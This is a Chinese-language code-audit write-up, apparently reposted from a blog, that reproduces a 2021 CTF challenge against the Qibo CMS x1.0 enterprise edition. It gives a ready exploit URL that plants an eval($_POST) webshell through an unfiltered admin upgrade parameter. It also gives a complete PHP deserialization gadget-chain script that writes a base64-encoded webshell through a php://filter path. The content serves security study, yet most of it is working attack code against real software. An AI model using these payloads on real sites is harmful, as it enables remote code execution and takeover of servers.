[代码审计]齐博建站系统x1.0企业版代码审计
Posted Y4tacker
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[代码审计]齐博建站系统x1.0企业版代码审计相关的知识,希望对你有一定的参考价值。
写在前面
复现2021 DASCTF July X CBCTF 4th赛题
齐博建站系统x1.0后台存在命令执行漏洞
漏洞点在于application/admin/controller/Upgrade.php
下的sysup
函数
跟入writelog
,很有趣没有过滤进行直接拼接
写入的是php文件有点傻
因此我们直接访问
http://yyds.top/admin.php/admin/upgrade/sysup.html?upgrade_edition=%22,%22%22=%3E-eval($_POST[%27yyds%27])-%22,];?%3E//
即可在runtime/client_upgrade_edition.php
生成一句话木马
齐博建站系统x1.0企业版前台反序列化漏洞
在application/index/controller/Labelmodels.php
下的get_label
方法
传个数组进去就行了,网上也有这个版本poc,当然肯定还有其他更好用的,懂得都懂
<?php
namespace think\\process\\pipes {
class Windows {
private $files = [];
public function __construct($files)
{
$this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
}
}
}
namespace think {
abstract class Model{
protected $append = [];
protected $error = null;
public $parent;
function __construct($output, $modelRelation)
{
$this->parent = $output; //$this->parent=> think\\console\\Output;
$this->append = array("xxx"=>"getError"); //调用getError 返回this->error
$this->error = $modelRelation; // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
}
}
}
namespace think\\model{
use think\\Model;
class Pivot extends Model{
function __construct($output, $modelRelation)
{
parent::__construct($output, $modelRelation);
}
}
}
namespace think\\model\\relation{
class HasOne extends OneToOne {
}
}
namespace think\\model\\relation {
abstract class OneToOne
{
protected $selfRelation;
protected $bindAttr = [];
protected $query;
function __construct($query)
{
$this->selfRelation = 0;
$this->query = $query; //$query指向Query
$this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
}
}
}
namespace think\\db {
class Query {
protected $model;
function __construct($model)
{
$this->model = $model; //$this->model=> think\\console\\Output;
}
}
}
namespace think\\console{
class Output{
private $handle;
protected $styles;
function __construct($handle)
{
$this->styles = ['getAttr'];
$this->handle =$handle; //$handle->think\\session\\driver\\Memcached
}
}
}
namespace think\\session\\driver {
class Memcached
{
protected $handler;
function __construct($handle)
{
$this->handler = $handle; //$handle->think\\cache\\driver\\File
}
}
}
namespace think\\cache\\driver {
class File
{
protected $options=null;
protected $tag;
function __construct(){
$this->options=[
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
'data_compress' => false,
];
$this->tag = 'xxx';
}
}
}
namespace {
$Memcached = new think\\session\\driver\\Memcached(new \\think\\cache\\driver\\File());
$Output = new think\\console\\Output($Memcached);
$model = new think\\db\\Query($Output);
$HasOne = new think\\model\\relation\\HasOne($model);
$window = new think\\process\\pipes\\Windows(new think\\model\\Pivot($Output,$HasOne));
echo urlencode(serialize($window));
}
以上是关于[代码审计]齐博建站系统x1.0企业版代码审计的主要内容,如果未能解决你的问题,请参考以下文章